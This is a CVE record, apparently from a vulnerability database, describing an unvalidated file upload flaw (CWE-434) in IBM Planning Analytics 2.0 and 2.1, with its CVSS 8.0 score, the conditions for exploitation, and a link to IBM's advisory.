CVE-2024-40693
Published: 24 January 2025
Description
IBM Planning Analytics 2.0 and 2.1 could be vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. Attackers can make use of this weakness and upload malicious executable files into the system, and it can be sent to victim for performing further attacks.
Security Summary
IBM Planning Analytics versions 2.0 and 2.1 are affected by CVE-2024-40693, a vulnerability stemming from inadequate validation of file content uploaded through the web interface. This unrestricted upload of files with dangerous types, mapped to CWE-434, enables attackers to introduce malicious executable files into the system. The issue carries a CVSS v3.1 base score of 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H), indicating high severity due to its potential for significant impact across confidentiality, integrity, and availability.
Exploitation requires an authenticated attacker with low privileges (PR:L) to access the web interface over the network. The attacker can upload malicious executable files with low complexity, though it demands user interaction from a victim (UI:R). Once uploaded, these files can be distributed to other users, facilitating further attacks such as malware execution on victim systems.
IBM has issued a security advisory at https://www.ibm.com/support/pages/node/7168387, which provides details on the vulnerability and recommended mitigations or patches for affected versions.
Details
- CWE(s)